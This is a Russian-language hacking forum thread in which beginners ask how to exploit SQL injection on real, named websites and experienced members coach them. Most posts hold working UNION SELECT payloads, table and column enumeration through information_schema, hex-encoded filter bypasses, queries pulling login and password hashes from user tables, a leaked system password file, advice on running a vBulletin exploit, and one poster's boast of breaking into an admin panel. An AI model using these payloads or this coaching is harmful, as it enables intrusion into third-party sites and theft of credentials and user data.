Все вопросы в духе
[b][i]А я нашёл сцылку http://microsoft.com?bla='id но т.к. я тупой то не знаю че дальше[/i][/b]
отныне разрешается постить только в этот топег.
Отдельно созданные топеги будут направляться в корзину.
Доки по sql-injection:
http://www.inattack.ru/group_article/34.html
http://www.magicdrum.ru/shop.php?id=-1+union+select+1,user.usrname+from+mysql.user/*
помогите разобраться с ссылочкой...
А я, вот нашел такую ахинею http://www.cosmetic.com.ua/articles/a18'
Но так ни4ё и не смог сделать толком. Пытался выводить имена таблиц, но опять ни4ё: acess denied-вроде. Мож просто толком не выу4ил, не то делал.
Так 4ё подможете, иль как?
Там как минимум два запроса подряд делается с использованием уязвимого параметра, и разное число полей выбирается, поэтому union select скорее всего не осуществить.
Вот это - при подборе полей к первому запросу:
Вот, вот эт и была у мя.
А xss я в первую очередь заметил, НО в xss я еще не разобрался, не знаю 4ё делать
Это не sql-инъекция скорее всего
Все, спасиб народ за моральную поддержку, я уже в админке [8D] Такое чувство радости, покруче оргазма [:D]
Админов прошу, если можно, удалить мои посты, т.к. самому вродь невозможно. Плз.
Вот решил отправиться в большое плавание хакинга ну и естественно первые рифы:
[link=http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+/]http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+/[/link]*
узнал следующее:
USER() - vatikan9_slavon@localhost
VERSION() - 4.0.18-log
DATABASE() - vatikan9_vatikan
Дальше не получается.
Как узнать какие таблицы есть в базе?
Запрос типа:
[link=http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33++from+nformation_schema.columns/]http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33++from+nformation_schema.columns/[/link]*
дает ответ:
1142 select command denied to user: 'vatikan9_slavon@localhost' for table 'columns'
Ваши рекомендации?
[b]I[/b]nformation_schema.columns появилась в mysql только в пятой версии
[b]SQLinj ORDER+UNION вроде все просто, нужен совет[/b]
есть на сервере (посещаемость 3к юзеров в сутки) скриптик с известным исходником
[color="#009933"][code]$query = "SELECT id, date FROM post order by date desc LIMIT $start,$per_page "; [/code][/color]так вот, в переменную $per_page можно загнать через _POST любое значение (даже с кавычками и слешами) но т.к. стоит ORDER то union не работает, выдает
[color="#00cc33"][color="#009933"][code]Incorrect usage of UNION and ORDER BY[/code][/color] [/color]
чтоб заработало - надо ставить скобки типа такого
[color="#009933"][code](SELECT ... ORDER ...) union (SELECT ... ) [/code][/color]но так ессно сделать нельзя, т.к. можно писать только в конец запроса через $per_page
нужно вытащить пароль (md5 пароля) pass из таблицы users, имя юзера известно или сделать себе статус админа (через UPDATE user_type в той же таблице)
вот собсно проблема, всем заранее спасибо за ответ
[link=http://forum.xakep.ru/showProfile.aspx?memid=27864][u][color=#0000ff]Dimonelite[/color][/u][/link] спасибо за ответ, но мне нужен совет, что сделать, что бы узнать эту информацию?
В MkPortal 1.1.1 есть язвимость связанная с просмотром галлереи. Описание есть на сайте. Я выполняю запрос при верном запросе возращается нормальная html страница без желаемой информации, при неверном страница что SQL-запрос неверен. Я посмотрел в скрипт MkPortal 1.1.1 в первом случае так и должно быть. Хотя sql-injection и работает, скрипт сам берет только первую запись, т.е. инфу о картинке. А теперь вопрос как мне увидеть результат на клиенте? Можно как-нибудь обновить данные из первой части запроса, что перед UNION и выдать результ через них?
подскажите пожалуйста что дальше с этим делать
http://www.fasie.ru/index.php?rid=120`
В том то и дело что результаты атаки начинаются со второй строки. А вы сами пробовали эту инъекцию?
Кажется доходит потихоньку, что ты имеешь ввиду. Смотри:
(например) select * from table where id=1 - стандартный запрос, который там по умолчанию.
select * from table where id=1 union select ... /* - если выводится только первая строка, тогда разумеется тебе покажутся только строки, которые принадлежат условию where id=1.
а если написать
select * from tabl where id=-1 union select .../* ? ;)
Тогда сайт выдает -> У вас нет прав для редактирования этого изображения. Вот мой запрос http://www.site.ru/index.php?ind=gallery&op=edit_file&iden=1+UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Часть http://www.site.ru/index.php?ind=gallery&op=edit_file&iden= стандартная. Далее грузим изображение на сервер и запоминаем его iden. Это позволит нам выполнить инъекцию UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Она и выполняется в результате имеем таблицу 1 -строка NULL,Название_картинки,Описание,NULL,NULL и 2 строка NULL,Admin,Password,NULL,NULL. Но браузер возратит только первую строку. В догонку, если невозможно вывести вторую строку, как мне составить запрос вида UNION UPDATE ..., т.е. вслепую рулить базой данных??
1) Ещё раз при iden = -1 union select -> Ошибка, нет прав редактировать изображение
2) Попробую, а что делает limit 0,1. Если на сайте vBulletin -> то как называется столбец с пользователями и паролями??
3) Получается добавить можно только выборку?
приветствую всех мне хотелось бы узнать я нашел сайт в кторо id=2-1 равняется id=1 если ставлю кавычку то выпадает ошибка но команды которые пытаюсь прописать не получаются узнал что на сайте с помощью php скрипта производится фильтрование и этот скрипт превращает запросы в несуразицу подскажите возможно ли каким нибудь способом обойти этот скрипт для того что бы произвести sql инъекцию извините если что то не так описал я только начинаю[sm=bc.gif]
Так как сказать "убейся", значит ничего не сказать, то:
1)Учи русский, пунктуацию.
2)Либо конкретно описывай проблему, либо давай ссылку на конкретную уязвимость, если хочешь, чтобы тебе помогли.
>но команды которые пытаюсь прописать не получаются
какие команды? что именно не получается? нифига не понятно.
Код защиты от SQL-иньекций
relline - вопрос с точки зрения взломщика или кодера? Если кодера - читай http://forum.xakep.ru/fb.aspx?m=655311
Наверно такая проверка спасет от sql-inj. Т.к. никаких разделителей даже не засунуть. Другое дело, что подобный код не всегда можно использовать, потому что далеко не все легальные строки выдержат такую жесткую фильтрацию.
Если $indx предварительно проходит ту фильтрацию, то из строки убираются кавычки. Как тут инъекцию в основной sql-запрос провести, даже за кавычки не выйдешь?
SQL_инъекция[как оптимальнее подбирать поля]
http://www.rosmed.ru/news.php?act=by_id&news_id=130' , а что дальше то ...???
http://www.rosmed.ru/news.php?act=by_id&news_id=-130+unon+select+1,2,3 и т.д. пока ошибка не исчезнет
Здравствуйте! Обнаружил сайт объявлений, где в тексте объявлений, если ввести двойную кавычку, выводится ошибка. Решил попробовать сделать инъекцию, но сайт все время выдавал ошибки. Привожу ниже текст ошибок.
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT * FROM sale UNION INSERT INTO sale SET text="", price="", user_name' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" UNION SELECT * FROM sale UNION INSERT INTO sale SET text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268307"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; SELECT * FROM sale ; INSERT INTO sale SET text="", price="", user_name="", use' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" ; SELECT * FROM sale ; INSERT INTO sale SET text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268416"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select null/* union insert into sale set text="", price="", user_name="", ' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" union select null/* union insert into sale set text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268977"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; select null/* union insert into sale set text="", price="", user_name="", user' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" ; select null/* ; insert into sale set text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194269044"
SQL-инъекция в GET ничего не дает - выводится та же страница. Подскажите, что делать, пожалуйста, я ни разу до этого ничего не ломал.
UNION после INSERT - это мечты. Ищи инъекцию в SELECT запросе.
нашел глючный сай и сталкнулся с ошибкой что делать незнаю
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Ошибка базы меню SELECT * from leftmenu1_c where id=1\' в index.php
Пристрелите их! Неужели так сложно, ПРЕЖДЕ чем зайти в этот топик, прочесть ХОТЯ БЫ ОДНУ статью про SQL-Инъекции?!
У меня проблема есть сайт стоит на mysqli 5.0.45
на мой запрос dogs_list.php?group_id=-1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/limit/**/120,1/*
Выводин название строк.
Но строки одмин или что то вроде не нашел а на запрос посмотреть содержимое любой колонке dogs_list.php?group_id=-1/**/union/**/select/**/1/**/from/**/1/*
не как не реагирует
Ничего не понял, честно говоря.
select 1 from 1...
чего ты хотел этим добиться?
Не лучше ли выбрать username,user_password из таблицы forum_users? ;)
Блин не выходит ((( в таблице forum_users только Anonymous а в поле user_password пусто ((( а что либо связанное с аdminom я не нашел. может кто подскажет где искать?
Как мне найти админа в таблицах? я пересмотрел все заголовки их там около 120 и не где не встретил не слово о админе.
Здравствуйте!
Нашел на сайте скрипт реагирующий на команды:
было
test.php?id=3
при изменениях типа test.php?id=3' выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/.../test.php on line 29
поставил
test.php?id=1<100 or 2000
изменения работают, ошибки нет.
Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)?
Например:
test.php?id=1<100 or 2000 --; select ALL from users
Здравствуйте!
Нашел на сайте скрипт реагирующий на команды:
было
[code]test.php?id=3 [/code]
при изменениях типа[code] test.php?id=3'[/code] выдает:
[code]Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/.../test.php on line 29 [/code]
поставил
[code]test.php?id=1<100 or 2000 [/code]
изменения работают, ошибки нет.
Возможно как то этот запрос завершить и вывести какую нить таблицу или зделать команду для бекапа базы в определённую директорию (в наличии есть открытая на сайте!)?
Например:
[code]test.php?id=1<100 or 2000 --; select ALL from users[/code]
Ты имеешь дело с mysql, поэтому
1)Используй в качестве комментария /*
2)Не получится разделять запросы через ;, вообще никак не получится. Нужно подбирать union, если хочешь узнать какие-нибудь данные
[code]
test.php?id=1+union+select+1,2,3,... (и в конце /*)
[/code]
Пока не задолбаешься. как только ошибка исчезнет, изменяй 1 на [b]-1[/b] или на [b]1+and+1=0[/b]
Или за логарифм от количества столбцов в исходном запросе, через order by легко подобрать кол-во полей. За подробностями либо читай сначала эту тему, либо в гугл.
скажите пожалуста как найти эти SQL-инъекции
Какой то дурдом, чтот тут не то, перепробывал вот так:
test.php?id=-1+union+select+null,null..../* (до 20-30 штук писал... ошибка не исчезла)
и вот так:
test.php?id=/*union+select+null....../* (до 20-30 штук писал... ошибка не исчезла)
[:@]
p.s. Написал Пхп скрипт на cURL с перебором запросов... фтыкнул 200 null,null.. и 1,1,1... - всеравно выдает ошибку!
У меня есть вопросик :)
вот я нащел сайт... в конце его скрипта который выдаёт пользавателей группы написал stat.php?sector=Moodle[b]' вобшим выдало ошибку [/b]
sql error:
stat.php?sector=Moodle' and 1=0 union select 1,2,3.... /*
Если не ошибаюсь, то количество полей должно быть равно 13.
народ кто подскажет где взять программку для перевода символов в char.
Самому написать :)
А вообще еще можно перевод в hex юзать. Пиши скрипт на php:
<?php
$string = '...';
echo "0x".bin2hex($string);
?>
и потом спокойно используй и в select, и в where. только в into outfile должны быть реальные кавычки и подобные трюки не прокатят.
1
Возможно, что в этой таблице просто нет никаких записей. Потому что вариант нехватки привилегий для доступа к ней менее вероятен (уязвимый скрипт работает в той же БД, где и таблица author)
[code]http://shop.kalyany.ru/index.php?categoryID=-38+union+select+(USER()/*[/code]
[code]http://shop.kalyany.ru/index.php?categoryID=38'[/code]
Подобрал кол-во столбцёв, их там аж 1, но вот инфа не отображаеться почему?
[code]http://shop.fans.com.ua/index.php?productID=8'[/code]
а здесь с помощью ордер бай не подбираеться.
to Dimonelite
А поподробнее про char brute можешь рассказать или сылку дать.
[b]Блин застрял, не могу сопоставить названия таблиц и колонок для запросов....[/b][:@]
[b]С помощью запроса[/b]
index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Column_name,5,6,7,8,9+from+information_schema.columns
[b]получил следeдующие названия колонок[/b], [b]с помощью:[/b]
index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,Table_name,5,6,7,8,9+from+information_schema.tables
[b]получил след названия таблиц (все писать не буду, возьму самые на мой взгляд интересные):
Названия таблиц: [/b] [b]Столбцы[/b]
CHARACTER_SETS DEFAULT_COLLATE_NAME
COLLATIONS DESCRIPTION
COLLATION_CHARACTER_SET_APPLICABILITY MAXLEN
COLUMNS COLLATION_NAME
COLUMN_PRIVILEGES ID
KEY_COLUMN_USAGE IS_DEFAULT
PROFILING INDEX_NAME
ROUTINES SEQ_IN_INDEX
SCHEMATA COLLATION
SCHEMA_PRIVILEGES CARDINALITY
STATISTICS SUB_PART
TABLES PACKED
TABLE_CONSTRAINTS NULLABLE
TABLE_PRIVILEGES INDEX_TYPE
TRIGGERS COMMENT
USER_PRIVILEGES TABLE_TYPE
VIEWS ENGINE
Categories VERSION
GoodsList ROW_FORMAT
Groups TABLE_ROWS
OrderedCarts AVG_ROW_LENGTH
Orders DATA_LENGTH
cpg11d_albums MAX_DATA_LENGTH
cpg11d_banned INDEX_LENGTH
cpg11d_categories DATA_FREE
cpg11d_comments AUTO_INCREMENT
cpg11d_config CREATE_TIME
cpg11d_pictures UPDATE_TIME
cpg11d_usergroups CHECK_TIME
cpg11d_users TABLE_COLLATION
cpg11d_votes CHECKSUM
phpbb_auth_access CREATE_OPTIONS
phpbb_banlist TABLE_COMMENT
phpbb_categories CONSTRAINT_TYPE
phpbb_config TRIGGER_CATALOG
phpbb_confirm TRIGGER_SCHEMA
phpbb_disallow TRIGGER_NAM
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_sessions
phpbb_sessions_keys
phpbb_themes_name
phpbb_user_group
phpbb_users
phpbb_words
GroupsMan
[b]Теперь пытаюсь подставлять оба значения в один запрос, перебирая по очереди:
[/b]index.php?GRID=33&CID=104&ID=99999+union+select+1,2,3,[u][b]INDEX_NAME[/b][/u],5,6,7,8,9+from+[u][b]phpbb_user_group[/b][/u]/* [b]????
Какие комбинации не пробую - один фиг ошибка:
Unknown column 'INDEX_NAME' in 'field list'
[:@][:@][:@][:@] Подскажите че делаю не так ???[:@][:@][:@][:@][:@][:(]
[/b]
Чему всегда поражаюсь на таких сайтах, так это, либо обилию постов с насмешками и посылами в гугл, который меня сюда и привел, либо полной тишине:(
+union+select+full_shit,full_shit,full_shit,full_shit,/*
Ты считаешь себя очень умным? Значит в гугл тебя посылать нельзя? А ты ХОТЬ ЧТО-НИБУДЬ знаешь по этой теме?
что тебе мешает писать select concat(table_name,char(124),column_name) from information_schema.columns? До этого никак нельзя было додуматься, нет? И в гугле пошарить тоже никак, да? И ты все еще считаешь себя самым умным, а никто на форуме ничего не знают, и только и умеют, что незаслуженно посылать таких, как ты, в гугл?
P.S.
select column_name from information_schema.columns
так ты выбрал названия ВСЕХ колонок от ВСЕХ таблиц. И почему ВСЕ эти колонки должны присутствовать в phpbb_users?
[i]Кто нибудь поможет с взломом форума на базе YabbSE 1.5.5. ?
[/i]SQL инъекция в параметре '$postid' в функции ModifyMessage2: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* [:@]
у меня такая трабла
когда php?id=394'....то выдает одну ошибку Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in............, а когда php?id=394+order+by+1/* то никаких ошибок
попробуй
php?id=-1+......
вот я нашел как php?id=394'+order+by+8/*
потом -394+union+select+1,2,3,4,5,6,7,8/*[b] и нету цифр куда выводить инфу...[/b]
Ты сам себе противоречишь, order by ты подбирал, закрывая кавычкой 394, а строя конструкцию с union, уже забыл про кавычку.
А ты думаешь я не пробывал! Это скорее всего blind inj !?
блин, ситуёвина - напал на один сайт на котором стоит фильтрация по букве. тоесть ввожу в адресную строку +union+select+111,concat(login,char(58),password)+from+users+limit+0,1/* - на выходе инфа - "Unknown column 'assword' in 'field list'". пробовал вводить используя аски, хекс. не помогает. вопрос: возможно ли обратиться к колонке не явно, не по имени и получить адекватній результат в виде значения а не просто слова password?
попробуй
+union+select+111,concat(login,char(58),password)+from+users+where+column_name=0x70617373776f7264 ........
0x70617373776f7264 - password
както так, хотя может я и ошибаюсь....[:D]
Есть скрипт позволяющий делать SQL inject, никаких ограничений USER() выдал что сижу под root@localhost.
Вопрос как то можно выяснить какие бд присутсвую в mysql. ?
[8|] Помогите пожалуйста. Вот сайт www.berezovka.clan.su . Не знаю что делать? Написан на чём хер его знает, пришёл к выводу что на конструкторском сайте каком-то. Админка www.berezovka.clan.su\admin Просканировал Xspider-ом выплинул какин-то ошибки, чё то c openSSH, куки нашёл, но нечего. Покажите мне ламеру из ламеров что делать в таком случае? Можно ли провести сдесь sql-inj или чё-то другое можно сделать.А?[sm=bc.gif]
сразу видно что ты даже не понимаешь что такое sql-inj ....
поповоду сайта - он на укозе, двиг там хороший и админы не спящие.... имхо кроме как пихнуть троя и получить пасс врятли что получится......
Может всетаки имеет смысл создать по моей теме отдельный топик ? (а то бардак какой то)
Вообще как то можно через SQL injecting mysql узнать какие там db т.е show databases;
Речь идет про 4 ку и Table 'information_schema.TABLES' doesn't exist
Eсть урл вида ?id=1
Такая вещь на него не действует ?id=1', но действуте такая ?id=2-1, отображается то же что и при ?id=1. Все попытки узнать количество полей таким образом ?[link=http://www.lamer.org/index.php&id=1+union+select+1,2,3,4,5,6]id=1+union+select+1,2,3,4,5,6[/link]... ?[link=http://www.lamer.org/index.php&id=-1+union+select+1,2,3,4,5,6,]id=-1+union+select+1,2,3,4,5,6,[/link] увенчались тем, что отображается пустая страница. Это говорит о том, что хоть ?id=2-1 не проверяется, но применить иньекцию нельзя?
Пробывал и через ?id=1+order+by+50, то же пустая страница и никаких ошибок..., я понимаю, что если ошибка не отоборажается это ещё не значит, что её нет, но что можно ещё попробывать не знаю.
Может есть какие-нибудь соображения?
А может быть, что на самом сайте нет админки? Никак не могу найти!
Логично. Надо подумать. Может быть просто при ?id=1 и ?id=2 выводится одинаковый контент?
Еще попробуй ?id=1qwe, если ничего не изменится, то точно туши косяк.
нашел сайт, на котором используется MySQL 5.0.45-log. есть возможность узнавать имена таблиц и столбцов (information_schema), чтобы узнать имена столбцов в конкретной таблице её имя для условия where приходится переводить в HEX вид. как можно получить содержимое таблиц? запрос типа -1/**/union/**/select/**/1,2,3,4,имя_столбца/**/from/**/имя_таблицы/* не выдает результатов... ЧАРить пробовал, ХЕКСировать пробовал, не помогает.
Limit попробуй в конце дописывать.
Limit 0,1
Limit 1,1
и т.д.
Есть несколько вариантов, почему не хочет выбираться username,password из users
1)такой таблицы нет :)
2)есть такая таблица, но не в текущей БД. Для этого когда выбираешь table_name,column_name from information_schema.columns, еще выбирай и table_schema (т.е. название БД, в которой находится эта таблица, например superdbname) тогда потом пиши select ... from superdbname.users
3)В этой таблице нет записей вообще. т.е. пустая таблица
4)Кодировка
вот этот пункт особенно важен.
возможно кодировка данных в таблице users отличается от кодировки данных в запросе, в который ты внедряешься. Попробуй
функции aes_encrypt и aes_decrypt соответственно. Про них уже давно писалось в журнале
Dimonelite, спасибо большое!
кстати, если используется aes_decrypt()/aes_encrypt(), то как будет выглядеть синтаксис команды UPDATE? например, если запрос имеет вид: -1/**/union/**/select/**/1,2,3,4,aes_decrypt(aes_encrypt(concat(head,char(58),text),0x71),0x71)/**/from/**/news/**/where/**/id=0x31/*. подскажите пожалуйста.
UPDATE и UNION [b]не совместимы[/b]. И в подзапрос UPDATE тоже [b]не засунешь[/b]. Так что ответ: никак не будет выглядеть :)
А если скрипт дырявый полностью, то есть заходишь а там уже во всю скули по всему экрану...что с этим можно сдеать?
Смотри какой запрос, сравнивай с текущес строкой адреса, анализируй вобщем.
И думай куда тебе воткнуть свою часть запроса. Но сначало тебе нужно вылезти на страницу которая хоть что то отоьражала иначе как ты увидишь данные.
Посылая серверу через браузер "левое" значение переменной sess=` получил вот это:
[b]Warning[/b]: Cannot modify header information - headers already sent by (output started at /usr/home/maksimx/domains/himland.ru/public_html/chat/include/chat.inc:19) in [b]/usr/home/maksimx/domains/domain.name/public_html/chat/index.php[/b] on line [b]136[/b]
document.write ('')
<frame src=/index.php?sess=`>
[b]Warning[/b]: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in [b]Unknown[/b] on line [b]0[/b]
Просканив XSpiderom, я нашёл что на порт 3306
"подключение к MySQL серверу с неавторизованного адреса запрещено"
[/align]Можно ли посмотреть какие таблицы и(или) поля там есть или нет? Что для этого нужно сделать?
[/align]Буду рад любой помощи =)
Update: да, забыл ОС - FreeBSD-20040419 (это выдал тот же XSpider) версия Apache - [color=#205ac8]Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e PHP/4.4.4 FrontPage/5.0.2.2510[/color]
[/align]Если нужна какая-нибудь дополнительная информация, предоставлю что смогу.
Если это и можно считать ошибкой, и даже если это и можно как-то использовать, то к sql-инъекциям это точно никакого отношения не имеет.
Да? Ну что ж, может это можно использовать как XSS... Спасибо, что хоть сказали, в каком направлении не надо плыть =)
Где можно потренироваться в sql-inj? на многих сайтах кавычки фильтруются и прочие приемы, новичку сложно разобраться. Подскажите скрипты: чатов, cms и т.п. где есть примитивные sql-inj. Я хочу на локалхосте сначала потренироваться.
имеется инжект
запрос:
http://www.host.ru/gallery/?show=gal&id=2+union+select+1,2/*
без ошибок, но id там используется 2 раза поэтому вторая ошибка возникает
http://www.host.ru/gallery/?show=gal&id=2+union+select+1,2,3,4,5,6/*
тут наоборот первая ошибка появляется вторая пропадает.
Собственно проблема в том что по всей видимости из результата поля берутся по именам и в странице ничего интересного нет (заюзать user() version() database() не получается)
Теоретически надо бы скинуть into outfile, но кавычка в запрос попадает экранированной.
Можно всетаки тут чемто поживиться или бросить и искать другой инжект?
Попробуй
id=-2+union+select+1,2,3,4,5,6/*
а то похоже ты забываешь свести на нет результат первого запроса(а именно в этом случае будет выводиться результат union'a)
народ подскажите пожалуйста что с этим можно сделать?
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin adm:*:1000:0::/usr/local/www:/bin/sh [/align][hr]
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
[hr]
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
[hr]
adm:*:1000:0::/usr/local/www:/bin/sh
Это в раздачу слонов запихать можно
А что, в слонах когда-то было что-то интересное?
2 [link=http://forum.xakep.ru/showProfile.aspx?memid=27864]Dimonelite[/link]
О! Спасибо, я чувствовал что истина гдето рядом :)
а почему на половину и как их закончить до конца?
запёрся тут йа [/align]есть сайт, там есть уязвимость[/align][link=http://www.pocomaxa-extreme.ru/content/project.php?id=4+union+select+1,2,3,4,/]http://www.pocomaxa-extreme.ru/content/project.php?id=4+union+select+1,2,3,4,/[/link]*[/align]кол-во полей не находит о_О чо делать? памагите люди знающие!!!!!!!!! [/align]
Помогите разобраться с http://www.lolbot.ru/content.php?z=-1
Я новенький и хочу научить скул инжекту но чето пока не могу сайт найти нормальный где это можно осуществить =)
посмотрите можно ли здесь что-то сделать? у меня ничего не выходит... может я неправильно ищу сайты...
http://www.mercuries.ru/c_index.php?no=13'
http://www.happyland-drink.ru/brands.php?id=-1+order+by+29/*
и есть ли какая-то раздница между тем что ставить в конце... /* или --
а у меня вопрос: как можно узнать названия полей и таблиц с помощью information schema вы чтото подобное писали но я никак разобраться не могу.
+: Леха учже спрашивал типа как можно потрениться в скл инжектах - есть ли специальные сайты для этого. ктото дал адрес милворма - там експлоиты - собственно нафиг они нам ? нам нужен типа сайт с уже заложенной уязвимостью и где расписано как можно ее реальзовать.
С извинениями, я
ребята интерсно решение такой проблемы/
есть сайт ,по запросу
http://www.сайт.com.ua/continents/continent_m.php?ID=1'&CID=1
выводит
[b]064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND TYPE.TYPEID=BLOCK.TYPEID AND LANGUAGE_ID=448' at line 1
strSQL= SELECT BLOCK.*,TYPE.NAME AS TYPENAME FROM TYPE,BLOCK WHERE CATEGORYID=1 AND PARENTID=1\' AND TYPE.TYPEID=BLOCK.TYPEID AND LANGUAGE_ID=448
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/algol/www/dbclass.php on line 84
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
strSQL= SELECT NAME FROM IBCOUNTRIES WHERE COUNTRYID=1\'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/algol/www/dbclass.php on line 77[/b]
подскажите как дальше дейстовать, и второй вопрос и что можно сделать дальше исходя из этой уязвимости? только начинаю осваивать искусство sql)---[&:]
Извитите за мой топик... Я просто очень запутался...
Помогите со [link=http://www.xakep.ru/post/36982/vBulletin_sql_injection_privilege_escalation_Exploit.txt]сплойтом[/link]
Проблема в том что я не силен в С++ а тем более в Перл... Никак не могу запустить сплойт...
Заранее спасибо за помощь[:)]
ну если сплойт перла то запускаешь пуск-выполнить-cmd и там уже указываешь [путь до интерпритатора перла] [путь до сплойта] ну например C:\perl\bin\perl.exe D:\script\1.pl если нужно будет указать дополнительные параметры к сплойту то вылезит типа спрака че да как например -h host -l login -p password и дописываешь эти данные через пробел
Привет..
исследовал один интересный для меня сайт(оч хотелось бы попасть в админку )))))
и заметил что при установке значения, стоятоящего более чем из 12 цифр, в одном из параметров .. выдается ошибка..
может ли это быть чем-то полезным при инъекции?
Вот ошибка....
Microsoft OLE DB Provider for SQL Server[font="times new roman"][size=3] [/size][/font][font=arial][size=2]error '80040e07'[/size][/font][font="times new roman"][size=3] [/size][/font]
[font=arial][size=2]Error converting data type numeric to int.[/size][/font]
[font=arial][size=2]/include/fun_cat.asp[/size][/font][font=arial][size=2], line 284[/size][/font]
[font=arial][size=2][/size][/font]
[font=arial][size=2]Вот запрос...[/size][/font]
[font=arial][size=2][/size][/font]
......./default.asp?catalogID=1010101010101
Помогите )))
Спасибки!
LeXeR_SS запустить пробовал но там синтаксичных ошыбок больше чем во мне[:D]. Я не знаю как их исправлять (вернее чем)...[X(]
Подскажите что делать я ввел sid=2+UNION+SELECT+null,null,null,null/*, ошибка исчезла, а потом что делать [8|]
ИЛИ в другом разделе ввожу ?id=107', он выводит ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
люди подскажите
1)есть такая не понятная мне вещ profile.php?do=editpassword при изменение на profile.php?do=editpassword' выдается просто пустая страница и при других изменениях
типа union+select+null/* получается тоже самое.Скажите это вопше уезвимость или нет???
2)и еще forumdisplay.php?f=2 изменение на forumdisplay.php?f=2' открывает туже forumdisplay.php?f=2 а если forumdisplay.php?f=3-1 то откроет forumdisplay.php?f=3.
скажите это уезвимость???Пробовал forumdisplay.php?f=2+union+select+null/* выдает forumdisplay.php?f=2 а null писал штук 50 всеравно не какой реакции.
блин много чего обшарил так ничего толком и ненашел... или там есть уязвимость но я видимо не смог ее углядеть... хочу научиться, но даже немогу начать...
Нашел инъекцию -1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
узнал версию 5.0.24-standard, подставив вместо двойки VERSION(). Узнал пользователя pravto@localhost, и
db_pravauto1, что делать дальше
Он выводит ошибку, а на том месте, где выводит инфу или 2, ничего нет. Ошибка следующая:
[b]Warning[/b]: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in [b]/www/hosts/site.com/html/rasc2.php[/b] on line [b]10[/b]
Я уже замачился [:@]
